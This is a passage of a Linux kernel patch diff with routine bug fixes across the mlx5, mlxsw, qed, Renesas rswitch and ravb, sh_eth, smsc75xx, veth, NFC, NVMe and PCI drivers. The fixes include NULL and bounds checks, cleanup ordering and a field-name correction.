++				   struct rb_root *root, u32 function)
+ {
+ 	u64 recl_pages_to_jiffies = msecs_to_jiffies(mlx5_tout_ms(dev, RECLAIM_PAGES));
+ 	unsigned long end = jiffies + recl_pages_to_jiffies;
+ 
+ 	while (!RB_EMPTY_ROOT(root)) {
++		u32 ec_function = mlx5_get_ec_function(function);
++		u32 function_id = mlx5_get_func_id(function);
+ 		int nclaimed;
+ 		int err;
+ 
+-		err = reclaim_pages(dev, func_id, optimal_reclaimed_pages(),
+-				    &nclaimed, false, mlx5_core_is_ecpf(dev));
++		err = reclaim_pages(dev, function_id, optimal_reclaimed_pages(),
++				    &nclaimed, false, ec_function);
+ 		if (err) {
+-			mlx5_core_warn(dev, "failed reclaiming pages (%d) for func id 0x%x\n",
+-				       err, func_id);
++			mlx5_core_warn(dev, "reclaim_pages err (%d) func_id=0x%x ec_func=0x%x\n",
++				       err, function_id, ec_function);
+ 			return err;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+index f5b2d965d476d..12540feb45088 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+@@ -2937,6 +2937,7 @@ static int mlxsw_sp_netdevice_event(struct notifier_block *unused,
+ 
+ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ {
++	refcount_set(&mlxsw_sp->parsing.parsing_depth_ref, 0);
+ 	mlxsw_sp->parsing.parsing_depth = MLXSW_SP_DEFAULT_PARSING_DEPTH;
+ 	mlxsw_sp->parsing.vxlan_udp_dport = MLXSW_SP_DEFAULT_VXLAN_UDP_DPORT;
+ 	mutex_init(&mlxsw_sp->parsing.lock);
+@@ -2945,6 +2946,7 @@ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ static void mlxsw_sp_parsing_fini(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	mutex_destroy(&mlxsw_sp->parsing.lock);
++	WARN_ON_ONCE(refcount_read(&mlxsw_sp->parsing.parsing_depth_ref));
+ }
+ 
+ struct mlxsw_sp_ipv6_addr_node {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+index 09e32778b012d..4a73e2fe95ef9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+@@ -10381,11 +10381,23 @@ err_reg_write:
+ 					      old_inc_parsing_depth);
+ 	return err;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++	bool old_inc_parsing_depth = mlxsw_sp->router->inc_parsing_depth;
++
++	mlxsw_sp_mp_hash_parsing_depth_adjust(mlxsw_sp, old_inc_parsing_depth,
++					      false);
++}
+ #else
+ static int mlxsw_sp_mp_hash_init(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	return 0;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++}
+ #endif
+ 
+ static int mlxsw_sp_dscp_init(struct mlxsw_sp *mlxsw_sp)
+@@ -10615,6 +10627,7 @@ err_register_inet6addr_notifier:
+ err_register_inetaddr_notifier:
+ 	mlxsw_core_flush_owq();
+ err_dscp_init:
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ err_mp_hash_init:
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ err_neigh_init:
+@@ -10655,6 +10668,7 @@ void mlxsw_sp_router_fini(struct mlxsw_sp *mlxsw_sp)
+ 	unregister_inet6addr_notifier(&mlxsw_sp->router->inet6addr_nb);
+ 	unregister_inetaddr_notifier(&mlxsw_sp->router->inetaddr_nb);
+ 	mlxsw_core_flush_owq();
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ 	mlxsw_sp_lb_rif_fini(mlxsw_sp);
+ 	mlxsw_sp_vrs_fini(mlxsw_sp);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev.c b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+index d61cd32ec3b65..86a93cac26470 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+@@ -5083,6 +5083,11 @@ static int qed_init_wfq_param(struct qed_hwfn *p_hwfn,
+ 
+ 	num_vports = p_hwfn->qm_info.num_vports;
+ 
++	if (num_vports < 2) {
++		DP_NOTICE(p_hwfn, "Unexpected num_vports: %d\n", num_vports);
++		return -EINVAL;
++	}
++
+ 	/* Accounting for the vports which are configured for WFQ explicitly */
+ 	for (i = 0; i < num_vports; i++) {
+ 		u32 tmp_speed;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+index 6190adf965bca..f55eed092f25d 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+@@ -422,7 +422,7 @@ qed_mfw_get_tlv_time_value(struct qed_mfw_tlv_time *p_time,
+ 	if (p_time->hour > 23)
+ 		p_time->hour = 0;
+ 	if (p_time->min > 59)
+-		p_time->hour = 0;
++		p_time->min = 0;
+ 	if (p_time->msec > 999)
+ 		p_time->msec = 0;
+ 	if (p_time->usec > 999)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 0f54849a38235..894e2690c6437 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1455,8 +1455,6 @@ static int ravb_phy_init(struct net_device *ndev)
+ 		phy_remove_link_mode(phydev, ETHTOOL_LINK_MODE_100baseT_Half_BIT);
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -2379,6 +2377,8 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ {
+ 	struct platform_device *pdev = priv->pdev;
+ 	struct device *dev = &pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 	int error;
+ 
+ 	/* Bitbang init */
+@@ -2400,6 +2400,14 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ 	if (error)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/renesas/rswitch.c b/drivers/net/ethernet/renesas/rswitch.c
+index 2370c7797a0aa..5118117a17eef 100644
+--- a/drivers/net/ethernet/renesas/rswitch.c
++++ b/drivers/net/ethernet/renesas/rswitch.c
+@@ -241,7 +241,7 @@ static int rswitch_get_num_cur_queues(struct rswitch_gwca_queue *gq)
+ 
+ static bool rswitch_is_queue_rxed(struct rswitch_gwca_queue *gq)
+ {
+-	struct rswitch_ext_ts_desc *desc = &gq->ts_ring[gq->dirty];
++	struct rswitch_ext_ts_desc *desc = &gq->rx_ring[gq->dirty];
+ 
+ 	if ((desc->desc.die_dt & DT_MASK) != DT_FEMPTY)
+ 		return true;
+@@ -284,13 +284,13 @@ static void rswitch_gwca_queue_free(struct net_device *ndev,
+ 	if (gq->gptp) {
+ 		dma_free_coherent(ndev->dev.parent,
+ 				  sizeof(struct rswitch_ext_ts_desc) *
+-				  (gq->ring_size + 1), gq->ts_ring, gq->ring_dma);
+-		gq->ts_ring = NULL;
++				  (gq->ring_size + 1), gq->rx_ring, gq->ring_dma);
++		gq->rx_ring = NULL;
+ 	} else {
+ 		dma_free_coherent(ndev->dev.parent,
+ 				  sizeof(struct rswitch_ext_desc) *
+-				  (gq->ring_size + 1), gq->ring, gq->ring_dma);
+-		gq->ring = NULL;
++				  (gq->ring_size + 1), gq->tx_ring, gq->ring_dma);
++		gq->tx_ring = NULL;
+ 	}
+ 
+ 	if (!gq->dir_tx) {
+@@ -322,14 +322,14 @@ static int rswitch_gwca_queue_alloc(struct net_device *ndev,
+ 		rswitch_gwca_queue_alloc_skb(gq, 0, gq->ring_size);
+ 
+ 	if (gptp)
+-		gq->ts_ring = dma_alloc_coherent(ndev->dev.parent,
++		gq->rx_ring = dma_alloc_coherent(ndev->dev.parent,
+ 						 sizeof(struct rswitch_ext_ts_desc) *
+ 						 (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
+ 	else
+-		gq->ring = dma_alloc_coherent(ndev->dev.parent,
+-					      sizeof(struct rswitch_ext_desc) *
+-					      (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
+-	if (!gq->ts_ring && !gq->ring)
++		gq->tx_ring = dma_alloc_coherent(ndev->dev.parent,
++						 sizeof(struct rswitch_ext_desc) *
++						 (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
++	if (!gq->rx_ring && !gq->tx_ring)
+ 		goto out;
+ 
+ 	i = gq->index / 32;
+@@ -362,14 +362,14 @@ static int rswitch_gwca_queue_format(struct net_device *ndev,
+ 				     struct rswitch_private *priv,
+ 				     struct rswitch_gwca_queue *gq)
+ {
+-	int tx_ring_size = sizeof(struct rswitch_ext_desc) * gq->ring_size;
++	int ring_size = sizeof(struct rswitch_ext_desc) * gq->ring_size;
+ 	struct rswitch_ext_desc *desc;
+ 	struct rswitch_desc *linkfix;
+ 	dma_addr_t dma_addr;
+ 	int i;
+ 
+-	memset(gq->ring, 0, tx_ring_size);
+-	for (i = 0, desc = gq->ring; i < gq->ring_size; i++, desc++) {
++	memset(gq->tx_ring, 0, ring_size);
++	for (i = 0, desc = gq->tx_ring; i < gq->ring_size; i++, desc++) {
+ 		if (!gq->dir_tx) {
+ 			dma_addr = dma_map_single(ndev->dev.parent,
+ 						  gq->skbs[i]->data, PKT_BUF_SZ,
+@@ -398,7 +398,7 @@ static int rswitch_gwca_queue_format(struct net_device *ndev,
+ 
+ err:
+ 	if (!gq->dir_tx) {
+-		for (i--, desc = gq->ring; i >= 0; i--, desc++) {
++		for (i--, desc = gq->tx_ring; i >= 0; i--, desc++) {
+ 			dma_addr = rswitch_desc_get_dptr(&desc->desc);
+ 			dma_unmap_single(ndev->dev.parent, dma_addr, PKT_BUF_SZ,
+ 					 DMA_FROM_DEVICE);
+@@ -408,9 +408,9 @@ err:
+ 	return -ENOMEM;
+ }
+ 
+-static int rswitch_gwca_queue_ts_fill(struct net_device *ndev,
+-				      struct rswitch_gwca_queue *gq,
+-				      int start_index, int num)
++static int rswitch_gwca_queue_ext_ts_fill(struct net_device *ndev,
++					  struct rswitch_gwca_queue *gq,
++					  int start_index, int num)
+ {
+ 	struct rswitch_device *rdev = netdev_priv(ndev);
+ 	struct rswitch_ext_ts_desc *desc;
+@@ -419,7 +419,7 @@ static int rswitch_gwca_queue_ts_fill(struct net_device *ndev,
+ 
+ 	for (i = 0; i < num; i++) {
+ 		index = (i + start_index) % gq->ring_size;
+-		desc = &gq->ts_ring[index];
++		desc = &gq->rx_ring[index];
+ 		if (!gq->dir_tx) {
+ 			dma_addr = dma_map_single(ndev->dev.parent,
+ 						  gq->skbs[index]->data, PKT_BUF_SZ,
+@@ -443,7 +443,7 @@ err:
+ 	if (!gq->dir_tx) {
+ 		for (i--; i >= 0; i--) {
+ 			index = (i + start_index) % gq->ring_size;
+-			desc = &gq->ts_ring[index];
++			desc = &gq->rx_ring[index];
+ 			dma_addr = rswitch_desc_get_dptr(&desc->desc);
+ 			dma_unmap_single(ndev->dev.parent, dma_addr, PKT_BUF_SZ,
+ 					 DMA_FROM_DEVICE);
+@@ -453,21 +453,21 @@ err:
+ 	return -ENOMEM;
+ }
+ 
+-static int rswitch_gwca_queue_ts_format(struct net_device *ndev,
+-					struct rswitch_private *priv,
+-					struct rswitch_gwca_queue *gq)
++static int rswitch_gwca_queue_ext_ts_format(struct net_device *ndev,
++					    struct rswitch_private *priv,
++					    struct rswitch_gwca_queue *gq)
+ {
+-	int tx_ts_ring_size = sizeof(struct rswitch_ext_ts_desc) * gq->ring_size;
++	int ring_size = sizeof(struct rswitch_ext_ts_desc) * gq->ring_size;
+ 	struct rswitch_ext_ts_desc *desc;
+ 	struct rswitch_desc *linkfix;
+ 	int err;
+ 
+-	memset(gq->ts_ring, 0, tx_ts_ring_size);
+-	err = rswitch_gwca_queue_ts_fill(ndev, gq, 0, gq->ring_size);
++	memset(gq->rx_ring, 0, ring_size);
++	err = rswitch_gwca_queue_ext_ts_fill(ndev, gq, 0, gq->ring_size);
+ 	if (err < 0)
+ 		return err;
+ 
+-	desc = &gq->ts_ring[gq->ring_size];	/* Last */
++	desc = &gq->rx_ring[gq->ring_size];	/* Last */
+ 	rswitch_desc_set_dptr(&desc->desc, gq->ring_dma);
+ 	desc->desc.die_dt = DT_LINKFIX;
+ 
+@@ -595,7 +595,7 @@ static int rswitch_rxdmac_init(struct rswitch_private *priv, int index)
+ 	struct rswitch_device *rdev = priv->rdev[index];
+ 	struct net_device *ndev = rdev->ndev;
+ 
+-	return rswitch_gwca_queue_ts_format(ndev, priv, rdev->rx_queue);
++	return rswitch_gwca_queue_ext_ts_format(ndev, priv, rdev->rx_queue);
+ }
+ 
+ static int rswitch_gwca_hw_init(struct rswitch_private *priv)
+@@ -673,13 +673,14 @@ static bool rswitch_rx(struct net_device *ndev, int *quota)
+ 	u16 pkt_len;
+ 	u32 get_ts;
+ 
++	if (*quota <= 0)
++		return true;
++
+ 	boguscnt = min_t(int, gq->ring_size, *quota);
+ 	limit = boguscnt;
+ 
+-	desc = &gq->ts_ring[gq->cur];
++	desc = &gq->rx_ring[gq->cur];
+ 	while ((desc->desc.die_dt & DT_MASK) != DT_FEMPTY) {
+-		if (--boguscnt < 0)
+-			break;
+ 		dma_rmb();
+ 		pkt_len = le16_to_cpu(desc->desc.info_ds) & RX_DS;
+ 		skb = gq->skbs[gq->cur];
+@@ -704,19 +705,22 @@ static bool rswitch_rx(struct net_device *ndev, int *quota)
+ 		rdev->ndev->stats.rx_bytes += pkt_len;
+ 
+ 		gq->cur = rswitch_next_queue_index(gq, true, 1);
+-		desc = &gq->ts_ring[gq->cur];
++		desc = &gq->rx_ring[gq->cur];
++
++		if (--boguscnt <= 0)
++			break;
+ 	}
+ 
+ 	num = rswitch_get_num_cur_queues(gq);
+ 	ret = rswitch_gwca_queue_alloc_skb(gq, gq->dirty, num);
+ 	if (ret < 0)
+ 		goto err;
+-	ret = rswitch_gwca_queue_ts_fill(ndev, gq, gq->dirty, num);
++	ret = rswitch_gwca_queue_ext_ts_fill(ndev, gq, gq->dirty, num);
+ 	if (ret < 0)
+ 		goto err;
+ 	gq->dirty = rswitch_next_queue_index(gq, false, num);
+ 
+-	*quota -= limit - (++boguscnt);
++	*quota -= limit - boguscnt;
+ 
+ 	return boguscnt <= 0;
+ 
+@@ -738,7 +742,7 @@ static int rswitch_tx_free(struct net_device *ndev, bool free_txed_only)
+ 
+ 	for (; rswitch_get_num_cur_queues(gq) > 0;
+ 	     gq->dirty = rswitch_next_queue_index(gq, false, 1)) {
+-		desc = &gq->ring[gq->dirty];
++		desc = &gq->tx_ring[gq->dirty];
+ 		if (free_txed_only && (desc->desc.die_dt & DT_MASK) != DT_FEMPTY)
+ 			break;
+ 
+@@ -1416,7 +1420,7 @@ static netdev_tx_t rswitch_start_xmit(struct sk_buff *skb, struct net_device *nd
+ 	}
+ 
+ 	gq->skbs[gq->cur] = skb;
+-	desc = &gq->ring[gq->cur];
++	desc = &gq->tx_ring[gq->cur];
+ 	rswitch_desc_set_dptr(&desc->desc, dma_addr);
+ 	desc->desc.info_ds = cpu_to_le16(skb->len);
+ 
+diff --git a/drivers/net/ethernet/renesas/rswitch.h b/drivers/net/ethernet/renesas/rswitch.h
+index 49efb0f31c77a..0584670abead5 100644
+--- a/drivers/net/ethernet/renesas/rswitch.h
++++ b/drivers/net/ethernet/renesas/rswitch.h
+@@ -915,8 +915,8 @@ struct rswitch_gwca_queue {
+ 	bool dir_tx;
+ 	bool gptp;
+ 	union {
+-		struct rswitch_ext_desc *ring;
+-		struct rswitch_ext_ts_desc *ts_ring;
++		struct rswitch_ext_desc *tx_ring;
++		struct rswitch_ext_ts_desc *rx_ring;
+ 	};
+ 	dma_addr_t ring_dma;
+ 	int ring_size;
+diff --git a/drivers/net/ethernet/renesas/sh_eth.c b/drivers/net/ethernet/renesas/sh_eth.c
+index 71a4991133080..14dc5833c465c 100644
+--- a/drivers/net/ethernet/renesas/sh_eth.c
++++ b/drivers/net/ethernet/renesas/sh_eth.c
+@@ -2029,8 +2029,6 @@ static int sh_eth_phy_init(struct net_device *ndev)
+ 	if (mdp->cd->register_type != SH_ETH_REG_GIGABIT)
+ 		phy_set_max_speed(phydev, SPEED_100);
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -3074,6 +3072,8 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	struct bb_info *bitbang;
+ 	struct platform_device *pdev = mdp->pdev;
+ 	struct device *dev = &mdp->pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 
+ 	/* create bit control struct for PHY */
+ 	bitbang = devm_kzalloc(dev, sizeof(struct bb_info), GFP_KERNEL);
+@@ -3108,6 +3108,14 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	if (ret)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/sun/ldmvsw.c b/drivers/net/ethernet/sun/ldmvsw.c
+index 8addee6d04bd8..734a817d3c945 100644
+--- a/drivers/net/ethernet/sun/ldmvsw.c
++++ b/drivers/net/ethernet/sun/ldmvsw.c
+@@ -287,6 +287,9 @@ static int vsw_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	rmac = mdesc_get_property(hp, vdev->mp, remote_macaddr_prop, &len);
+ 	err = -ENODEV;
+ 	if (!rmac) {
+diff --git a/drivers/net/ethernet/sun/sunvnet.c b/drivers/net/ethernet/sun/sunvnet.c
+index fe86fbd585861..e220620d0ffc9 100644
+--- a/drivers/net/ethernet/sun/sunvnet.c
++++ b/drivers/net/ethernet/sun/sunvnet.c
+@@ -433,6 +433,9 @@ static int vnet_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	vp = vnet_find_parent(hp, vdev->mp, vdev);
+ 	if (IS_ERR(vp)) {
+ 		pr_err("Cannot find port parent vnet\n");
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 943d26cbf39f5..71712ea25403d 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -101,6 +101,7 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 		goto out;
+ 
+ 	skb->dev = addr->master->dev;
++	skb->skb_iif = skb->dev->ifindex;
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 047c581457e34..5813b07242ce1 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -79,7 +79,7 @@
+ #define SGMII_ABILITY			BIT(0)
+ 
+ #define VEND1_MII_BASIC_CONFIG		0xAFC6
+-#define MII_BASIC_CONFIG_REV		BIT(8)
++#define MII_BASIC_CONFIG_REV		BIT(4)
+ #define MII_BASIC_CONFIG_SGMII		0x9
+ #define MII_BASIC_CONFIG_RGMII		0x7
+ #define MII_BASIC_CONFIG_RMII		0x5
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index 00d9eff91dcfa..df2c5435c5c49 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -199,8 +199,11 @@ static int lan95xx_config_aneg_ext(struct phy_device *phydev)
+ static int lan87xx_read_status(struct phy_device *phydev)
+ {
+ 	struct smsc_phy_priv *priv = phydev->priv;
++	int err;
+ 
+-	int err = genphy_read_status(phydev);
++	err = genphy_read_status(phydev);
++	if (err)
++		return err;
+ 
+ 	if (!phydev->link && priv->energy_enable && phydev->irq == PHY_POLL) {
+ 		/* Disable EDPD to wake up PHY */
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 95de452ff4dad..5d6454fedb3f1 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -2200,6 +2200,13 @@ static int smsc75xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (rx_cmd_a & RX_CMD_A_LEN) - RXW_PADDING;
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x\n", rx_cmd_a);
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index dfc7d87fad59f..30ae6695f8643 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -701,7 +701,8 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 	u32 frame_sz;
+ 
+ 	if (skb_shared(skb) || skb_head_is_locked(skb) ||
+-	    skb_shinfo(skb)->nr_frags) {
++	    skb_shinfo(skb)->nr_frags ||
++	    skb_headroom(skb) < XDP_PACKET_HEADROOM) {
+ 		u32 size, len, max_head_size, off;
+ 		struct sk_buff *nskb;
+ 		struct page *page;
+@@ -766,9 +767,6 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 
+ 		consume_skb(skb);
+ 		skb = nskb;
+-	} else if (skb_headroom(skb) < XDP_PACKET_HEADROOM &&
+-		   pskb_expand_head(skb, VETH_XDP_HEADROOM, 0, GFP_ATOMIC)) {
+-		goto drop;
+ 	}
+ 
+ 	/* SKB "head" area always have tailroom for skb_shared_info */
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index ed9c5e2cf3ad4..a187f0e0b0f7d 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -175,6 +175,7 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	arg.phy = phy;
+ 	init_completion(&arg.done);
+ 	cntx = phy->out_urb->context;
+ 	phy->out_urb->context = &arg;
+diff --git a/drivers/nfc/st-nci/ndlc.c b/drivers/nfc/st-nci/ndlc.c
+index 755460a73c0dc..d2aa9f766738e 100644
+--- a/drivers/nfc/st-nci/ndlc.c
++++ b/drivers/nfc/st-nci/ndlc.c
+@@ -282,13 +282,15 @@ EXPORT_SYMBOL(ndlc_probe);
+ 
+ void ndlc_remove(struct llt_ndlc *ndlc)
+ {
+-	st_nci_remove(ndlc->ndev);
+-
+ 	/* cancel timers */
+ 	del_timer_sync(&ndlc->t1_timer);
+ 	del_timer_sync(&ndlc->t2_timer);
+ 	ndlc->t2_active = false;
+ 	ndlc->t1_active = false;
++	/* cancel work */
++	cancel_work_sync(&ndlc->sm_work);
++
++	st_nci_remove(ndlc->ndev);
+ 
+ 	skb_queue_purge(&ndlc->rcv_q);
+ 	skb_queue_purge(&ndlc->send_q);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index fbed8d1a02ef4..70b5e891f6b3b 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -781,16 +781,26 @@ static blk_status_t nvme_setup_discard(struct nvme_ns *ns, struct request *req,
+ 		range = page_address(ns->ctrl->discard_page);
+ 	}
+ 
+-	__rq_for_each_bio(bio, req) {
+-		u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
+-		u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
+-
+-		if (n < segments) {
+-			range[n].cattr = cpu_to_le32(0);
+-			range[n].nlb = cpu_to_le32(nlb);
+-			range[n].slba = cpu_to_le64(slba);
++	if (queue_max_discard_segments(req->q) == 1) {
++		u64 slba = nvme_sect_to_lba(ns, blk_rq_pos(req));
++		u32 nlb = blk_rq_sectors(req) >> (ns->lba_shift - 9);
++
++		range[0].cattr = cpu_to_le32(0);
++		range[0].nlb = cpu_to_le32(nlb);
++		range[0].slba = cpu_to_le64(slba);
++		n = 1;
++	} else {
++		__rq_for_each_bio(bio, req) {
++			u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
++			u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
++
++			if (n < segments) {
++				range[n].cattr = cpu_to_le32(0);
++				range[n].nlb = cpu_to_le32(nlb);
++				range[n].slba = cpu_to_le64(slba);
++			}
++			n++;
+ 		}
+-		n++;
+ 	}
+ 
+ 	if (WARN_ON_ONCE(n != segments)) {
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index fc39d01e7b63b..9171452e2f6d4 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -123,9 +123,8 @@ void nvme_mpath_start_request(struct request *rq)
+ 		return;
+ 
+ 	nvme_req(rq)->flags |= NVME_MPATH_IO_STATS;
+-	nvme_req(rq)->start_time = bdev_start_io_acct(disk->part0,
+-					blk_rq_bytes(rq) >> SECTOR_SHIFT,
+-					req_op(rq), jiffies);
++	nvme_req(rq)->start_time = bdev_start_io_acct(disk->part0, req_op(rq),
++						      jiffies);
+ }
+ EXPORT_SYMBOL_GPL(nvme_mpath_start_request);
+ 
+@@ -136,7 +135,8 @@ void nvme_mpath_end_request(struct request *rq)
+ 	if (!(nvme_req(rq)->flags & NVME_MPATH_IO_STATS))
+ 		return;
+ 	bdev_end_io_acct(ns->head->disk->part0, req_op(rq),
+-		nvme_req(rq)->start_time);
++			 blk_rq_bytes(rq) >> SECTOR_SHIFT,
++			 nvme_req(rq)->start_time);
+ }
+ 
+ void nvme_kick_requeue_lists(struct nvme_ctrl *ctrl)
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index c11e0cfeef0f3..29c902b9aecbd 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3468,6 +3468,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x501E),   /* KINGSTON OM3PGP4xxxxQ OS21011 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++	{ PCI_DEVICE(0x1f40, 0x1202),   /* Netac Technologies Co. NV3000 NVMe SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1f40, 0x5236),   /* Netac Technologies Co. NV7000 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1001),   /* MAXIO MAP1001 */
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index f66ed13d7c11d..3935165048e74 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -756,8 +756,10 @@ static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
+ 
+ void nvmet_req_complete(struct nvmet_req *req, u16 status)
+ {
++	struct nvmet_sq *sq = req->sq;
++
+ 	__nvmet_req_complete(req, status);
+-	percpu_ref_put(&req->sq->ref);
++	percpu_ref_put(&sq->ref);
+ }
+ EXPORT_SYMBOL_GPL(nvmet_req_complete);
+ 
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index 83ae838ceb5f0..549c4bd5caeca 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -76,6 +76,27 @@ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n)
+ }
+ EXPORT_SYMBOL_GPL(pci_bus_resource_n);
+ 
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res)
++{
++	struct pci_bus_resource *bus_res, *tmp;
++	int i;
++
++	for (i = 0; i < PCI_BRIDGE_RESOURCE_NUM; i++) {
++		if (bus->resource[i] == res) {
++			bus->resource[i] = NULL;
++			return;
++		}
++	}
++
++	list_for_each_entry_safe(bus_res, tmp, &bus->resources, list) {
++		if (bus_res->res == res) {
++			list_del(&bus_res->list);
++			kfree(bus_res);
++			return;
++		}
++	}
++}
++
